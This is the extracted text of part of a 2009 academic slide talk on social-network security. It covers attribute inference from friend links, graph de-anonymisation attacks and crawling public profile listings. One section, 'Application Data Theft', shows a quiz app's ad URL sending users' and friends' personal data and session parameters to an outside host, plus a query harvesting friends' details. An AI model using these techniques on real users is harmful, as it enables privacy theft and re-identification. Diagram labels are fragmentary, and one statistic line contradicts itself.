![Page 77: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/77.jpg)
When In Doubt, Compute!
We do know many graph algorithms:
• Find important nodes
• Identify communities
• Train classifiers
• Identify anomalous connections
Major Privacy Implications!
![Page 78: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/78.jpg)
Privacy Questions
• What can we infer purely from link structure?
![Page 79: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/79.jpg)
Privacy Questions
• What can we infer purely from link structure?
A surprising amount!
• Popularity
• Centrality
• Introvert vs. Extrovert
• Leadership potential
• Communities
![Page 80: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/80.jpg)
Privacy Questions
• If we know nothing about a node but it's neighbours, what can we infer?
![Page 81: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/81.jpg)
Privacy Questions
• If we know nothing about a node but its neighbours, what can we infer?
A lot!
• Gender
• Political Beliefs
• Location
• Breed?
![Page 82: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/82.jpg)
Privacy Questions
• Can we anonymise graphs?
![Page 83: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/83.jpg)
• Can we anonymise graphs?
Not easily...
• Seminal result by Backstrom et al.: Active attack needs just 7 nodes
• Can do even better given user's complete neighborhood
• Also results for correlating users across networks
• Developing line of research...
Privacy Questions
![Page 84: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/84.jpg)
De-anonymisation (active)
B
CF
A
H
D G
E I
A Social Graph with Private Links
![Page 85: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/85.jpg)
De-anonymisation (active)
B
CF 3
2
4A
1H
D G5
E I
Attacker adds k nodes with random edges
![Page 86: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/86.jpg)
De-anonymisation (active)
B
CF 3
2
4A
1H
D G5
E I
Attacker links to targeted nodes
![Page 87: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/87.jpg)
De-anonymisation (active)
Graph is anonymised and edges are released
![Page 88: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/88.jpg)
De-anonymisation (active)
3
2
4
1
5
Attacker searches for unique k-subgroup
![Page 89: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/89.jpg)
De-anonymisation (active)
3
2
4
1H
G5
Link between targeted nodes is confirmed
![Page 90: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/90.jpg)
De-anonymisation (passive)
• Similar to above, except k normal users collude and share their links
• Only compromise random targets
![Page 91: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/91.jpg)
De-anonymisation results
• 7 nodes need to be created in active attack
• De-anonymize 70 chosen nodes!
• 7 nodes in passive coalition compromise ~ 10 random nodes
![Page 92: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/92.jpg)
Cross-graph De-anonymisation
• Goal: identify users in a private graph by mapping to public graph
• “Shouldn't” work: graph isomorphism is NP-complete
• Works quite well in practice on real graphs!
![Page 93: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/93.jpg)
Cross-graph De-anonymisation
Public Graph Private Graph
![Page 94: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/94.jpg)
Cross-graph De-anonymisation
A
C
BA'
C'
B'
Public Graph Private GraphPublic Graph
Step 1: Identify Seed Nodes
![Page 95: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/95.jpg)
Cross-graph De-anonymisation
A
DC
BA'
D'C'
B'
Public Graph Private GraphPublic Graph
Step 2: Assign mappings based on mapped neighbors
![Page 96: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/96.jpg)
Cross-graph De-anonymisation
A
DC
E
BA'
D'C'
E'
B'
Public Graph Private GraphPublic Graph
Step 3: Iterate
![Page 97: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/97.jpg)
Cross-graph De-anonymisation
• Demonstrated on Twitter and Flickr
• Only 24% of Twitter users on Flickr, 5% of Twitter users on Flickr
• 31% of common users identified (~9,000) given just 30 seeds!
• Real-world attacks can be much more powerful
• Auxiliary knowledge
• Mapping of attributes, language use, etc.
![Page 98: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/98.jpg)
Privacy Questions
• What can we infer if we “compromise” a fraction of nodes?
![Page 99: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/99.jpg)
• What can we infer if we “compromise” a fraction of nodes?
A lot...
• Common theme: small groups of nodes can see the rest
• Danezis et al.
• Nagaraja
• Korolova et al.
• Bonneau et al.
Privacy Questions
![Page 100: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/100.jpg)
• What if we get a subset of neighbours for all nodes?
Privacy Questions
![Page 101: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/101.jpg)
• What if we get a subset of k neighbours for all nodes?
Emerging question for many social graphs
• Facebook and online SNS
• Mobile SNS
Privacy Questions
![Page 102: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/102.jpg)
A Quietly Introduced Feature...
Public Search Listings, Sep 2007
![Page 103: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/103.jpg)
Attack Scenario
• Spider all public listings
• Our experiments crawled 250 k users daily
• Implies ~800 CPU-days to recover all users
• Use sampled graph to compute functions of original
![Page 104: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/104.jpg)
Estimating Degrees
3
33
4
4
21
2
6
Average Degree: 3.5
![Page 105: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/105.jpg)
Estimating Degrees
3
33
4
4
21
2
6
Sampled with k=2
![Page 106: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/106.jpg)
Estimating Degrees
?
??
?
?
?1
?
?
Degree known exactly for one node
![Page 107: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/107.jpg)
Estimating Degrees
3.5
3.51.75
3.5
5.25
1.751
1.75
7
Naïve approach: Multiply in-degree by average degree / k
![Page 108: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/108.jpg)
Estimating Degrees
3.5
3.52
3.5
5.25
21
2
7
Raise estimates which are less than k
![Page 109: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/109.jpg)
Estimating Degrees
3.5
3.52
3.5
5.25
21
2
7
Nodes with high-degree neighbors underestimated
![Page 110: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/110.jpg)
Estimating Degrees
3.5
3.53.5
3.5
5.25
21
2
7
Iteratively scale by current estimate / k in each step
![Page 111: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/111.jpg)
Estimating Degrees
2.75
2.753.5
3.63
5.5
21
2
5.5
After 1 iteration
![Page 112: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/112.jpg)
Estimating Degrees
2.68
2.683.41
3.53
5.35
21
2
5.35
Normalise to estimated total degree
![Page 113: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/113.jpg)
Estimating Degrees
2.48
2.833.04
3.64
5.09
21
2
5.91
Convergence after n > 10 iterations
![Page 114: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/114.jpg)
Estimating Degrees
• Converges fast, typically after 10 iterations
• Absolute error is high—38% average
• Reduced to 23% for nodes with d ≥ 50
• Still accurately can pick high degree nodes
![Page 115: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/115.jpg)
Aggregate of x highest-degree nodes
![Page 116: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/116.jpg)
• Node Degree
• Dominating Set
• Betweenness Centrality
• Path Length
• Community Structure
Approximable Functions
![Page 117: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/117.jpg)
Conclusions
Social networking coming to dominate the web
Many old security lessons being re-learned
Social context changes fraud environment
Social graph challenging privacy requirements
![Page 118: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/118.jpg)
Hack #4: Application Data Theft
What happens when you take a quiz...
![Page 119: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/119.jpg)
Hack #4: Application Data Theft
Facebook Application Architecture
![Page 120: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/120.jpg)
Hack #4: Application Data Theft
URL for banner ad
http://sochr.com/i.php&name=[Joseph Bonneau]&nx=[My User ID]&age=[My DOB]&gender=[My Gender]&pic=[My Photo URL]&fname0=[Friend #1 Name 1]&fname1=[Friend #2 Name]&fname2=[Friend #3 Name]&fname3=[Friend #4 Name]&fpic0=[Friend #1 Photo URL]&fpic0=[Friend #2 Photo URL]&fpic0=[Friend #3 Photo URL]&fpic0=[Friend #4 Photo URL]&fb_session_params=[All of the quiz application's session parameters]
![Page 121: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/121.jpg)
Hack #4: Application Data Theft
Query made by banner ad through user's browser
select uid, birthday, current_location, sex, first_name, name, pic_square, relationship_status FROM user WHERE uid IN (select uid2 from friend where uid1 = ‘[current user id]‘) and strlen(pic) > 0 order by rand() limit 500
![Page 122: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/122.jpg)
Hack #4: Application Data Theft
What the users sees...
![Page 123: Social Networks and Security - Joseph Bonneau · 2018-09-12 · Social Networks and Security Checkpoint Sep 7, 2009 Joseph Bonneau, Computer Laboratory](https://reader033.fdocuments.net/reader033/viewer/2022043020/5f3c821bf317e955961a2a62/html5/thumbnails/123.jpg)
My Reading List
• http://www.cl.cam.ac.uk/~jcb82/sns_bib/main.html
• Questions?